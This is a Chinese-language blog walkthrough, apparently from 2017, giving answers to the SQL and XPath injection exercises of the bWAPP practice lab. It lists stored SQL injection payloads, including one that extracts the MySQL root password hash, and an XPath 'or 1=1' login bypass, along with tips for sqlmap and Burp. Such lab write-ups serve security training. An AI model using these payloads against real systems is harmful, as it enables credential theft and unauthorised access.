专栏首页农夫安全Bwapp漏洞平台答案全解-A1(第三篇)

Bwapp漏洞平台答案全解-A1(第三篇)

0x01 A1 - Injection(第三次)

1.21-SQL Injection - Stored (Blog)

输入:test','test')#
candy','candy')#
candy',(select password from mysql.user where user='root'limit 0,1))#
candy',(select version()))#
candy',(select user()))#

1.22-SQL Injection - Stored (SQLite)

用SQLmap的图形界面+burp抓包存成文件可以跑出来

-1.23-SQL Injection - Stored (User-Agent)

在User-Agent上有注入

使用sqlmap的 --risk --level 可以检测出

-1.24-SQL Injection - Stored (XML)

burp扫描出结果

-1.25-SQL Injection - Blind - Boolean-Based

SQL盲注-基于布尔

*1.26-SQL Injection - Blind - Time-Based

时间盲注,未做手工测试,可自行百度,

使用sqlmap可跑

-1.27-SQL Injection - Blind (SQLite)

SQL盲注-

-1.28-SQL Injection - Blind (WS/SOAP)

1.29-XML/XPath Injection (Login Form)

用户名:whatever' or 1=1 or'

绕过登陆

本文分享自微信公众号 - 网络安全社区悦信安(yuexin_an)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2017-07-19

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 自定义注解和解析器实现ButterKnife

    相信绝大部分的Android开发者都曾使用过ButterKnife, 利用ButterKnife开发者可以快速的实现实体view与xml的绑定,此外还能绑定各种...

    用户1269200
  • 解决WordPress Feed、RSS以及Sitemap.xml访问报错问题

    今天,查看站长平台的 sitemap 抓取情况时,发现提示解析错误: ? 很纳闷的点开看了下: ? 这个 sitemap_baidu_sp.xml 是 site...

    张戈
  • 移动SEO分享:php自动提交复合型Sitemap到百度搜索

    导读:本文分享的是移动 sitemap 协议说明及生成复合型 sitemap 的方法。所谓复合型就是指一个 sitemap.xml 既包含了 pc 页,也包含了...

    张戈
  • 厉害了,Servlet3的异步处理机制

    Servlet3发布好几年了,又有多少人知道它的新特性呢?下面简单介绍下。 主要增加了以下特性: 1、异步处理支持 2、可插性支持 3、注解支持,零配置,可不...

    Java技术栈
  • spring设置全局异常处理器

    1.spring设置全局异常,它的原理是向上捕获 spring.xml配置 <!--自定义全局异常处理器--> <bean id="globalE...

    Gxjun
  • Hadoop3.0集群安装知识

    问题导读 1.本文是如何定义master的? 2.如何配置hadoop守护进程环境? 3.配置Hadoop守护进程需要哪些配置文件? 4.yarn-site配...

    用户1410343
  • Java可以如何实现文件变动的监听

    Java可以如何实现文件变动的监听 应用中使用logback作为日志输出组件的话,大部分会去配置 logback.xml 这个文件,而且生产环境下,直接去修改l...

    小灰灰
  • Hadoop3.0: YARN Resource配置说明

    问题导读 1.yarn默认情况下使用哪些资源? 2.Yarn如何实现扩展自定义资源? 3.自定义资源,可以在哪个配置文件中配置? 4.哪些配置可以在yarn-...

    用户1410343
  • php自动生成百度开放适配PC页-手机页pattern对应关系sitemap.xml

    以前做百度开放适配一直是提交普通的 url 对应关系,这种方式有个缺点,就是必须每个页面的 url 关系都得兼顾,即有多少就得提交多少。 然而,很多网站并不是 ...

    张戈

扫码关注云+社区

领取腾讯云代金券